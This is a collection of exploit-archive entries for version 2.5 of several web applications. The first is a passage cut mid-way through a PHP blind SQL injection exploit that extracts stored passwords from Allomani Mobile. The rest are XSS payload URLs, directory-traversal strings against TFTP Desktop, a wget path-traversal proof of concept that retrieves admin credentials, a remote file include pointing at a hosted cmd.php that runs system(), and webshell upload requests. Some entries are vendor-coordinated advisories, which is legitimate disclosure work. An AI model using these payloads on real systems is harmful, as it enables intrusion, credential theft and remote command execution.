for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),11,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),12,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),13,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
echo "\n\n this exploit is made to give you the first 8 chars of username and first 13 of password";
?>
Allomani Mobile version 2.5 remote blind SQL injection exploit.
indoushka/Caricatier 2.5 Cross Site Scripting ( na)
======================================================================================== | # Title : caricatier 2.5 Cross Site Scripting Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : ÈÇÓÊÎÏÇã ÓßÑíÈÊ ÇáßÇÑíßÇÊíÑ ÇáÇÕÏÇÑ : Version 2.5 /http://www.php-ar.com/| | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://server/caricatier/comment.php?op=CatID%3D0&CatName=1<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1 | 2- http://server/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1 | 3- http://server/caricatier/view_caricatier.php?op=open&CatID=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1&CatName=indoushka@hotmail.com-00213771818860 | 4- http://server/caricatier/view_caricatier.php?op=open&CatID=0&CaricatierID=1&CatName=1<img+src=http://server/jpg.jpg+onload=alert(213771818860)> | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------
Caricatier version 2.5 suffers from a cross site scripting vulnerability.
chr1x/TFTP Desktop 2.5 Directory Traversal ( na)
+------------------------------------------------------------------------+ | ....... | | ..''xxxxxxxxxxxxxxx'... | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | | .xxxxxxxxxxxxxxxxxx'... ........ .'. | | 'xxxxxxxxxxxxxxx'...... '. | | 'xxxxxxxxxxxxxx'..'x.. .x. | | .xxxxxxxxxxxx'...'.. ... .' | | 'xxxxxxxxx'.. . .. .x. | | xxxxxxx'. .. x. | | xxxx'. .... x x. | | 'x'. ...'xxxxxxx'. x .x. | | .x'. .'xxxxxxxxxxxxxx. '' .' | | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | | .'xxxxxxx'.... ...xxxxxxx'. | | ..'xxxxx'.. ..xxxxx'.. | | ....'xx'.....''''... | | | | CubilFelino Security Research Labs | | proudly presents... | +------------------------------------------------------------------------+ Author: chr1x (chr1x@sectester.net) Date: August 30, 2010 Affected operating system/software, including full version details TFTP Desktop version 2.5, Tested on Windows XP PRO SP3 Download: http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe How the vulnerability can be reproduced Attack strings below: [*] Testing Path: .../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\...\boot.ini <- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini <- Vulnerable string!! Confirmation log: root@olovely:/# tftp tftp> connect (to) 192.168.1.53 tftp> ascii tftp> get (files) .../.../.../.../.../.../boot.ini Received 211 bytes in 0.0 seconds tftp> quit What impact the vulnerability has on the vulnerable system * High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
TFTP Desktop version 2.5 suffers from a directory traversal vulnerability.
team ' and 1=1--/PHPCollab 2.5 Unauthenticated Access ( na)
# Date: 3/5/2012 # Author: team ' and 1=1-- # Software Link: http://www.phpcollab.com/ # Version: 2.5 # Vulnerability was found during the AthCon IT Security Conference CTF #CTF organizer: echothrust We identified that the PhpCollab application installed under http://192.0.0.2/phpcollab/ allows the unauthenticated access of all authenticated content. Specifically when requesting a URL that requires authentication, such as: http://192.0.0.2/phpcollab/clients/listclients.php, the server responds with a redirect (location header) to '../index.php?session=false', which displays a session error and the login form. However upon inspecting the response of the request, we can clearly see that all the application data is returned. This issue allows us to access a number of PhpCollab pages without any authentication (it must be noted that some of the administration pages are not available when exploiting the issue). As an example by using the following command an attacker can retrieve the phpinfo of the server: curl -i http://192.0.0.2/phpcollab/administration/phpinfo.php phpinfo reveals that the system is: Linux lamp.acmesec.fake 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686
PHPCollab version 2.5 fails to properly block access to data on the system.
High-Tech Bridge SA/AWS XMS 2.5 Path Traversal ( na)
Advisory ID: HTB23147 Product: AWS XMS Vendor: http://www.aws-dms.com Vulnerable Version(s): 2.5 and probably prior Tested Version: 2.5 Vendor Notification: March 6, 2013 Vendor Patch: March 16, 2013 Public Disclosure: March 27, 2013 Vulnerability Type: Path Traversal [CWE-22] CVE Reference: CVE-2013-2474 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered path traversal vulnerability in AWS XMS, which can be exploited to read contents of arbitrary files. 1) Path Traversal in AWS XMS: CVE-2013-2474 The vulnerability exists due to insufficient filtration of "what" HTTP GET parameter passed to "/importer.php" script before using it in PHP "file()" function. A remote attacker can read contents of arbitrary files on the target system. The vulnerable script sets "text/javascript" Content-Type for the output data, which makes exploitation of the vulnerability via a web browser inconvenient. Exploitation via telnet or wget utilities is easier. The following PoC (Proof of Concept) code uses wget utility to download source code of "/default.php" file, which contains application configuration data and administrator’s credentials: wget http://[host]/importer.php?what=defaults.php%00.js To bypass protections against NULL-byte injection (implemented in PHP 5.3.4 and later versions) or enabled "magic_quotes_gpc", alternative techniques based on path normalization and length restrictions can be used. The second PoC code uses a large amount of '/' symbols (4096 is sufficient for the majority of platforms) to bypass the restrictions and get source code of the "/default.php" file: wget http://[host]/importer.php?what=defaults.php///////...//////.js ----------------------------------------------------------------------------------------------- Solution: Upgrade to AWS XMS 2.6 More Information: http://www.aws-dms.com/temp.php?use=templates/download.xml#xms-2.6 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23147 - https://www.htbridge.com/advisory/HTB23147 - Path Traversal in AWS XMS. [2] AWS XMS - http://www.aws-dms.com/ - XMS is an online visual web development enviroment and framework, providing a web application base, with multi language support, based on XML. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
AWS XMS version 2.5 suffers from a path traversal vulnerability.
Federico Fazzi/cms-bandits2.5.txt ( na)
-----------------------------------------------------
Advisory id: FSA:006
Author: Federico Fazzi
Date: 08/06/2006, 11:09
Sinthesis: cms-bandits 2.5, Remote command execution
Type: high
Product: http://sourceforge.net/projects/cms-bandits
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in td.php,
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
Error occured in img.php,
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
required register_global = On,
The users can include a remote file because
the $spaw_root is undeclare.
2) Proof of concept:
http://127.0.0.1/cms/dialogs/td.php?spaw_root=[cmd_with_final_slash]
http://127.0.0.1/cms/dialogs/img.php?spaw_root=[cmd_with_final_slash]
[cmd_with_final_slash] = http://example/cmd.php/
cmd.php = <?php system("commands here"); or passthru ?>
3) Solution:
sanitized the variable on img.php, td.php.
cms-bandits 2.5 is vulnerable to remote command execution in td.php and img.php is register_globals is on.
Benjamin Kunz Mejri/IPMap 2.5 Shell Upload ( na)
Title:
======
IPMap v2.5 iPad iPhone - Arbitrary File Upload Web Vulnerabilities
Date:
=====
2013-02-18
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=866
VL-ID:
=====
866
Common Vulnerability Scoring System:
====================================
6.3
Introduction:
=============
IPMap - IP Address Lookup Details & HTTP Wireless File Sharing with latest WorldWide IP database & FREE Monthly update.
Accuracy: Over 99.8% on a country level and 83% on a city level for the US within a 25 mile radius.
Features:
Auto Detect & Lookup
Your Real IP address
IP address Hostname
IP address Country Code
... ... ...
IP address Area Code
IP location Map
HTTP Wireless File Sharing
iTunes File Sync
Web Upload File Support
Customizable Background from your Photos Album
(Copy of the Homepage: https://itunes.apple.com/us/app/ipmap-ip-address-lookup-details/id416041538 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered an arbitrary file upload vulnerability in the mobile IPMap v2.5 app for the apple ipad & iphone.
Report-Timeline:
================
2013-02-18: Public Disclosure
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: IPMap - iPad iPhone 2.5
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A local file include and arbitrary file upload web vulnerability via POST request method is detected in the mobile IPMap v2.5 app
for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to
request unauthorized local webserver files.
1.1
The main vulnerbility is located in the upload file script of the webserver (http://192.168.0.10:6123/) when processing to load a manipulated
filename via POST request method. The execution of the injected path or file request will occur when the attacker is watching the file index listing
of the wifi web application web-server.
1.2
Remote attackers can also unauthorized implement mobile webshells by using multiple file extensions (pentest.php.js.gif) when processing to
upload (submit) via POST request method. The attacker uploads a file with a double extension or multiple extensions and access the file in the
secound step via directory webserver dir listing to compromise the apple iphone or ipad.
Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account.
Successful exploitation of the web vulnerabilities results in app/service manipulation and ipad or iphone compromise via file
include or unauthorized file (webshell) upload attacks.
Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]
Vulnerable Parameter(s):
[+] file > filename
Affected Module(s):
[+] File Dir Index - Listing
Proof of Concept:
=================
Both vulnerabilities can be exploited by remote attackers without privileged application user account and also without required user interaction.
For demonstration or reproduce ...
1.1
PoC: (POST)
-----------------------------307341202725627
Content-Disposition: form-data; name="file"; filename="../../../../cmd>home>tmp%00<'.png"
Content-Type: image/png
ÿØÿà
Review: File Dir Listing
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>IPMap</title>
<style>body { background-color:#f0f7fd; font-family:Tahoma,Arial,Helvetica,sans-serif;
font-size:18x; padding:15px; margin-left:15%; margin-right:15%; } </style></head><body>
<h2 style="background-color:#6897ff; margin:0; color:#fff; padding:5px 10px; border: 1px outset #aaa;border-bottom: 0px;">IPMap</h2>
<h4 style="background-color:#6897ff;margin:0; color:#fff; padding:0px 10px 8px 10px; border: 1px outset #aaa; border-top: 0px;">
The following files are hosted live from the iPhone's Docs folder.</h4><p><table style="text-align:center; border-color:#9bc0d2;
background:#f0f7fd; color:#4e697a; margin:0 auto;" border="1" cellpadding="0" cellspacing="0"><tbody><tr height="30"><td width="400">
<strong>File Name</strong></td><td width="400"><strong>File Info</strong></td></tr><tr height="30">
<td><a href="http://192.168.0.10:6123/../../../../cmd>home>tmp%00<'">%20%20%20%20&"><iframe src="../../../../cmd>home>tmp%00<'">%20%20%20%20&">
%20%20%20%20</a></td><td>(27.3 Kb, 2013-02-07 07:00:31 +0000)</td></tr></table></p><form action=""
method="post" enctype="multipart/form-data" name="form1"
id="form1"><table border="0" cellpadding="0" cellspacing="0"
style="text-align:center; margin:0 auto;"><tr
height="50"><td width="400"><label>upload file<input
type="file" name="file" id="file" /></label></td><td
width="400"><label><input type="submit" name="button"
id="button" value="Submit" /> <font size="-1">* Please do NOT
upload index.htm or
index.html</font></label></td></tr></table></form></body></html>
</iframe></a></td></tr></tbody></table></p></body></html>
1.2
PoC: (POST)
-----------------------------307341202725627
Content-Disposition: form-data; name="file"; filename="pentest.php.js.html.htm.xml.png"
Content-Type: image/gif
Reference(s):
http://192.168.0.10:6123/
Risk:
=====
The security risk of the arbitrary file upload web vulnerability via POST request method is estimated as critical.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
IPMap version 2.5 suffers from remote shell upload vulnerabilities.